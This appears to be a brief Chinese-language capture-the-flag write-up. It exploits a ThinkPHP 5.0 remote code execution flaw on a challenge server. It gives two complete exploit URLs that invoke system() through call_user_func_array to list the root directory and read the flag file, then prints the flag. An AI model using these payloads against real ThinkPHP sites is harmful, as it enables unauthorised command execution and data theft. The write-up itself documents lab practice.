一看页面是thinkphp v5版本,已知存在漏洞的,直接利用
THinkPHP5.0漏洞参考:https://www.cnblogs.com/backlion/p/10106676.html
读取文件目录:ls /
http://111.200.241.244:56979/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/
看到flag文件
查看flag:cat /flag
http://111.200.241.244:56979/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
flag{thinkphp5_rce}